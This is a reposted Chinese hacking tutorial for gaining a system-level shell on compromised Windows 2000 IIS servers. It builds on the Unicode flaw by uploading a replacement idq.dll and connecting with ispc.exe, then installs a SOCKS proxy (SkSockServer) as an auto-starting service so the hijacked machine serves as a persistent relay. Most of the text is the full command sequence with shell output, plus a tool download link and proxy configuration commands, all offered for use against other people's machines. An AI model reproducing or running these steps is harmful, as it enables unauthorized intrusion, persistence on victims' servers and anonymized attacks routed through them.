[转载]提升unicode权限 安装代理跳板

信息来源：HackBase.com

通过unicode漏洞的到的代理跳板权限太低，肉鸡一重启，跳板就不能用了：－（，所以我们就的想办法提高自己在肉鸡上的权限，来正确安装跳板。这样只要管理员没有发现，你就可以永远的使用这些跳板了！废话少说，看我怎么做！
我们怎样提高自己在肉鸡上的权限呢？我在网上找到这么个好东东！奉献给大家！下载地http://www.harbindeer.com/substorm/othersoft/iissystem.zip
首先，我们还是按照nicky的方法把SkSockServer.exe (改名为asd.exe）和刚才下载的压缩包里的idq.dll（要把他上传到一个可执行目录.文件名必须是一下其中的一个.
1、 idq.dll
2、 httpext.dll
3、 httpodbc.dll
4、 ssinc.dll
5、 msw3prt.dll
6、 author.dll
7、 admin.dll
8、 shtml.dll
9、 sspifilt.dll
10、compfilt.dll
11、pwsdata.dll
12、md5filt.dll
13、fpexedll.dll
）传到肉鸡上，idq.dll必须上传至IIS的一个可执行目录中，
例如/scripts，然后使用ispc.exe进行连接！当然也有好多其它办法，不过这个比较安全，不包漏自己的IP！记的把asd.exe拷贝到C:\WINNT\system32下!
在2000的在开始的运行菜单键入 cmd ，进入了命令控制符界面！然后使用ispc.exe进行连接：
C:\>ispc ***.***.***.***/scripts/idq.dll（根据自己的实际情况进行更改）
连接成功以后就可以得到一个shell了.不用再担心权限的问题了...不过这个程序的回显好像有些问题..没关系.小意思!!
下面是我的连接过程.由于回显的问题很乱的.对付着看吧~~~
C:\>ispc ***.***.***.***/scripts/idq.dll


Start to connect to the server...
We Got It!
Please Press Some to Enter Shell....


Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-1998 Microsoft Corp.

C:\WINNT\system32>asd.exe －install


C:\WINNT\system32>

C:\WINNT\system32>
asd.exe -install
Snake SockProxy Service installed.

C:\WINNT\system32>asd.exe -config starttype

C:\WINNT\system32>


C:\WINNT\system32>asd.exe -config starttype
The New StartType have set to 2 -- Auto

C:\WINNT\system32>asd.exe -config port 1011

C:\WINNT\system32>

C:\WINNT\system32>
asd.exe -config port 1011
The Port value have set to 1011

C:\WINNT\system32>net start skserver

C:\WINNT\system32>

C:\WINNT\system32>
net start skserver
Snake SockProxy Service 服务正在启动 .
Snake SockProxy Service 服务已经启动成功。


C:\WINNT\system32>
C:\WINNT\system32>
C:\WINNT\system32>
这样一个可以启动的跳板就做好了！以后只要网管没发现，呵呵，你就可以用久的使用这个跳板了，肉鸡重启，跳板也自动重启！
付：由命令行设置/显示 当前 端口,启动方式,允许的客户ip连接,远程跳板设置.
c:> SkSockServer -config show === [显示所有配置]
c:> SkSockServer -config port === [显示/设置 端口]
c:> SkSockServer -config StartType === [显示/设置 服务启动方式]
c:> SkSockServer -config client [add/del] === [显示/增加/删除 客户端的项目]
c:> SkSockServer -config SkServer [add/del] === [显示/增加/删除 经过SkServer的项目]
其实这种提升权限的方法不光可以用在Unicode漏洞上..具体的就等着你自己去想吧~~.

提醒一句.不要用来做坏事!!~~ 做个跳板就可以了